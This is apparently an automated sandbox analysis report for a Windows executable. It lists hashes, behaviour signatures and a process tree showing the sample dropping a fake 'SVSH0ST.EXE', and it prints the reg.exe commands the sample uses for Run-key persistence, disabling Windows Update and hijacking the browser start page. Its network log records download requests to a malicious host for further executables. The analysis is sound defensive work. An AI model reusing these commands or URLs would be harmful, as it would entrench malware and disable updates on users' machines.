Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
0s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231222-en -
resource tags
arch:x64arch:x86image:win10v2004-20231222-enlocale:en-usos:windows10-2004-x64system -
submitted
31/12/2023, 13:45 UTC
Behavioral task
behavioral1
Sample
388d1d5626a4192a172f9aa3351a679a.exe
Resource
win7-20231215-en
20 signatures
150 seconds
Behavioral task
behavioral2
Sample
388d1d5626a4192a172f9aa3351a679a.exe
Resource
win10v2004-20231222-en
7 signatures
150 seconds
General
-
Target
388d1d5626a4192a172f9aa3351a679a.exe
-
Size
25KB
-
MD5
388d1d5626a4192a172f9aa3351a679a
-
SHA1
4da2552f1e70e9882abda90409943c37c2830030
-
SHA256
6d163443389051e1a8c4fe585e0b97d7a16fb6855f0b13a719e401d042819354
-
SHA512
cfe2c7d11258fd6cb69bd37e789950e85b49c9c8a810864f8cb3e880aa252f70162757f45de423d63fa44bc807830f1349e9927c29127837ba5958f7097271a1
-
SSDEEP
768:mSSdAWyLwqHq43GfWaTc/5pwSPt8uLFtR:mh7qK43VH4SPLr
Score
7/10
Malware Config
Signatures
-
Executes dropped EXE 1 IoCs
pid Process 3736 SVSH0ST.EXE -
resource yara_rule behavioral2/memory/4048-0-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral2/memory/4048-8-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral2/memory/3736-66-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral2/memory/3736-89-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral2/memory/3736-264-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral2/memory/3736-267-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral2/memory/3736-301-0x0000000000400000-0x0000000000416000-memory.dmp upx behavioral2/memory/3736-324-0x0000000000400000-0x0000000000416000-memory.dmp upx -
Drops file in System32 directory 3 IoCs
description ioc Process File created C:\Windows\SysWOW64\SVSH0ST.EXE 388d1d5626a4192a172f9aa3351a679a.exe File opened for modification C:\Windows\SysWOW64\SVSH0ST.EXE 388d1d5626a4192a172f9aa3351a679a.exe File created C:\Windows\SysWOW64\SVSH0ST.EXE SVSH0ST.EXE -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Modifies registry key 1 TTPs 3 IoCs
pid Process 2064 reg.exe 5300 reg.exe 540 reg.exe -
Runs net.exe
-
Suspicious use of WriteProcessMemory 9 IoCs
description pid Process procid_target PID 4048 wrote to memory of 3736 4048 388d1d5626a4192a172f9aa3351a679a.exe 15 PID 4048 wrote to memory of 3736 4048 388d1d5626a4192a172f9aa3351a679a.exe 15 PID 4048 wrote to memory of 3736 4048 388d1d5626a4192a172f9aa3351a679a.exe 15 PID 4048 wrote to memory of 5044 4048 388d1d5626a4192a172f9aa3351a679a.exe 39 PID 4048 wrote to memory of 5044 4048 388d1d5626a4192a172f9aa3351a679a.exe 39 PID 4048 wrote to memory of 5044 4048 388d1d5626a4192a172f9aa3351a679a.exe 39 PID 4048 wrote to memory of 4992 4048 388d1d5626a4192a172f9aa3351a679a.exe 38 PID 4048 wrote to memory of 4992 4048 388d1d5626a4192a172f9aa3351a679a.exe 38 PID 4048 wrote to memory of 4992 4048 388d1d5626a4192a172f9aa3351a679a.exe 38
Processes
-
C:\Users\Admin\AppData\Local\Temp\388d1d5626a4192a172f9aa3351a679a.exe"C:\Users\Admin\AppData\Local\Temp\388d1d5626a4192a172f9aa3351a679a.exe"1⤵
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:4048 -
C:\Windows\SysWOW64\SVSH0ST.EXEC:\Windows\system32\SVSH0ST.EXE2⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:3736 -
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://www.http://ov.12vh.com/TJ.asp3⤵PID:5308
-
-
C:\Windows\SysWOW64\cmd.execmd.exe /c net start shellHWDetection3⤵PID:5940
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL /v CheckedValue /t REG_SZ /d 3 /f3⤵
- Modifies registry key
PID:2064
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WindowsUpdate /v DisableWindowsUpdateAccess /t REG_dword /d 00000001 /f3⤵PID:5792
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKCU\Software\Policies\Microsoft\Internet Explorer\Control Panel" /v "HomePage" /t REG_DWORD /d 00000001 /f3⤵PID:5052
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" add "HKCU\Software\Microsoft\Internet Explorer\Main" /v "Start Page" /t REG_EXPAND_SZ /d http://ov.12vh.com /f3⤵PID:2416
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V svchost /T REG_SZ /D C:\Windows\system32\SVSH0ST.EXE /F3⤵
- Modifies registry key
PID:5300
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /V svchost /T REG_SZ /D C:\Windows\system32\SVSH0ST.EXE /F3⤵
- Modifies registry key
PID:540
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\388d1d5626a4192a172f9aa3351a679a.bat""2⤵PID:4992
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\Temp\388d1d5626a4192a172f9aa3351a679a.bat2⤵PID:5044
-
-
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:5308 CREDAT:17410 /prefetch:21⤵PID:984
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start shellHWDetection1⤵PID:4620
-
C:\Windows\SysWOW64\net.exenet start shellHWDetection1⤵PID:4292
Network
-
Remote address:8.8.8.8:53Request19.177.190.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request59.128.231.4.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Requestov.12vh.comIN AResponseov.12vh.comIN A3.64.163.50
-
Remote address:8.8.8.8:53Requestov.12vh.comIN A
-
Remote address:8.8.8.8:53Requestov.12vh.comIN A
-
Remote address:8.8.8.8:53Requestwww.httpIN AResponse
-
Remote address:8.8.8.8:53Requestwww.httpIN AResponse
-
Remote address:8.8.8.8:53Requestg.bing.comIN AResponseg.bing.comIN CNAMEg-bing-com.a-0001.a-msedge.netg-bing-com.a-0001.a-msedge.netIN CNAMEdual-a-0001.a-msedge.netdual-a-0001.a-msedge.netIN A204.79.197.200dual-a-0001.a-msedge.netIN A13.107.21.200
-
Remote address:8.8.8.8:53Request175.178.17.96.in-addr.arpaIN PTRResponse175.178.17.96.in-addr.arpaIN PTRa96-17-178-175deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request200.197.79.204.in-addr.arpaIN PTRResponse200.197.79.204.in-addr.arpaIN PTRa-0001a-msedgenet
-
Remote address:8.8.8.8:53Request241.154.82.20.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request137.128.123.92.in-addr.arpaIN PTRResponse137.128.123.92.in-addr.arpaIN PTRa92-123-128-137deploystaticakamaitechnologiescom
-
Remote address:8.8.8.8:53Request137.128.123.92.in-addr.arpaIN PTR
-
Remote address:3.64.163.50:80RequestGET /se32.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ov.12vh.com
Connection: Keep-Alive
ResponseHTTP/1.1 410 Gone
Date: Fri, 05 Jan 2024 10:07:44 GMT
Content-Type: text/html
Content-Length: 542
Connection: keep-alive
-
Remote address:3.64.163.50:80RequestGET /se111.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: ov.12vh.com
Connection: Keep-Alive
ResponseHTTP/1.1 410 Gone
Date: Fri, 05 Jan 2024 10:07:44 GMT
Content-Type: text/html
Content-Length: 542
Connection: keep-alive
-
Remote address:8.8.8.8:53Request50.163.64.3.in-addr.arpaIN PTRResponse50.163.64.3.in-addr.arpaIN PTRec2-3-64-163-50eu-central-1compute amazonawscom
-
Remote address:8.8.8.8:53Request157.123.68.40.in-addr.arpaIN PTRResponse
-
Remote address:8.8.8.8:53Request0.204.248.87.in-addr.arpaIN PTRResponse0.204.248.87.in-addr.arpaIN PTRhttps-87-248-204-0lhrllnwnet
-
Remote address:8.8.8.8:53Request0.204.248.87.in-addr.arpaIN PTR
-
2.7kB 9.3kB 23 16
-
3.2kB 31.2kB 39 35
-
1.6kB 8.4kB 20 16
-
1.3kB 4.9kB 18 14
-
1.6kB 9.8kB 22 19
-
1.7kB 1.7kB 12 7
HTTP Request
GET http://ov.12vh.com/se32.exeHTTP Response
410HTTP Request
GET http://ov.12vh.com/se111.exeHTTP Response
410
-
72 B 158 B 1 1
DNS Request
19.177.190.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
59.128.231.4.in-addr.arpa
-
171 B 73 B 3 1
DNS Request
ov.12vh.com
DNS Request
ov.12vh.com
DNS Request
ov.12vh.com
DNS Response
3.64.163.50
-
54 B 129 B 1 1
DNS Request
www.http
-
54 B 129 B 1 1
DNS Request
www.http
-
56 B 158 B 1 1
DNS Request
g.bing.com
DNS Response
204.79.197.20013.107.21.200
-
72 B 137 B 1 1
DNS Request
175.178.17.96.in-addr.arpa
-
73 B 106 B 1 1
DNS Request
200.197.79.204.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
241.154.82.20.in-addr.arpa
-
146 B 139 B 2 1
DNS Request
137.128.123.92.in-addr.arpa
DNS Request
137.128.123.92.in-addr.arpa
-
70 B 134 B 1 1
DNS Request
50.163.64.3.in-addr.arpa
-
72 B 146 B 1 1
DNS Request
157.123.68.40.in-addr.arpa
-
142 B 116 B 2 1
DNS Request
0.204.248.87.in-addr.arpa
DNS Request
0.204.248.87.in-addr.arpa